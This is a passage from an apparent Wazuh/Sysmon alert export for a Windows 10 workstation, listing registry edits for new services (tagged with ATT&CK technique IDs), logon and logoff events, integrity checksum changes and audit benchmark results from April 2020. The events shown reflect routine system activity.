(0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.733"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.733 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.818",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.819585300Z"",""eventRecordID"":""1097"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.716\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.716"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.716 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 13:22:14.778",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.819288700Z"",""eventRecordID"":""1096"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.716\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.716"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.716 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.749",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.794367300Z"",""eventRecordID"":""1095"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 13:22:14.715",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.793980000Z"",""eventRecordID"":""1094"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.672",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.792603400Z"",""eventRecordID"":""1093"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 13:22:14.659",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.791723500Z"",""eventRecordID"":""1092"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.702\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.702"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.702 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:14.624",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.790287500Z"",""eventRecordID"":""1091"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.684\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_42bf6\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.684"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_42bf6\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.684 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_42bf6\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 13:22:14.608",9,"ATT&CK T1058:Registry edit for new 
service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T13:22:07.790075100Z"",""eventRecordID"":""1090"",""processID"":""2168"",""threadID"":""3212"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 13:22:07.684\r\nProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_42bf6\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 13:22:07.684"",""processGuid"":""{df9fc3d3-e7f5-5ea2-0000-001012a70000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_42bf6\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 13:22:07.684 +ProcessGuid: {df9fc3d3-e7f5-5ea2-0000-001012a70000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_42bf6\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 13:22:12.932",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 13:22:12.658",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:22:09.390",3,"Windows 
Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x382A9 + Linked Logon ID: 0x38239 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:09.374",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38239 + Linked Logon ID: 0x382A9 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x40 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. 
+ +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:07.550",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 13:22:06.732",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. 
It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:22:03.669",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 13:21:27.800",3,"Windows User Logoff",,"""User initiated logoff: + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38AED + +This event is generated when a logoff is initiated. No further user-initiated activity can occur. 
This event can be interpreted as a logoff event.""" +"Apr 24, 2020 @ 13:21:27.017",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:21:27.005",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 13:21:15.487",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:12Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:21:03.267",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. 
The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 13:20:56.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"Apr 24, 2020 @ 13:20:29.739",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 24, 2020 @ 13:20:27.328",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from auto start to demand start.""" +"Apr 24, 2020 @ 13:20:26.435",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T13:16:23Z. 
Reason: RulesEngine.""" +"Apr 24, 2020 @ 13:20:25.626",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 24, 2020 @ 13:19:38.103",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 13:19:38.091",8,"Windows Audit Policy changed",,"""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""" +"Apr 24, 2020 @ 13:19:30.697",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '1af7f0914012f801bdabc07119bd84db' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: '98d0a499a8ec59bdfd79d0750a971a939fa5e3a2' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +", +"Apr 24, 2020 @ 13:19:29.668",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '185d612f78fce1526ce008c1931abcc6' +New md5sum is : '0d61dacf49c4b7682f45fff7f8f57479' +Old sha1sum was: '7a7004354744dcd7886dc8307a1634cc3a0e059c' +New sha1sum is : '71a31e06fb81f2dcbcdf75c75730b24491f00526' +", +"Apr 24, 2020 @ 13:19:29.651",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '100ead94668944d84b2a1144423fcb73' +New md5sum is : '6ea2dee3d2bb35e8d704d196aedd6a76' +Old sha1sum was: '455e697a971d8f61c574214108cb1d5263461398' +New sha1sum is : '3bf6639fb706c11a88f9ee628fac8040d19fe6e6' +", +"Apr 24, 2020 @ 13:19:28.291",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. +Old md5sum was: '4d6e359f48b4d661879fa30d266022bd' +New md5sum is : '49574a9da5b73510ecb8125c7786d037' +Old sha1sum was: '36dbf8e97699b0ca2ccc6e1503bfdfbfc3494986' +New sha1sum is : 'fc3c9a4be6b806a974693af1dc528845db7631da' +", +"Apr 24, 2020 @ 13:19:25.885",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f13d' was added. +", +"Apr 24, 2020 @ 13:19:25.869",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3f13d\Security' was added. +", +"Apr 24, 2020 @ 13:19:25.010",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x258 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
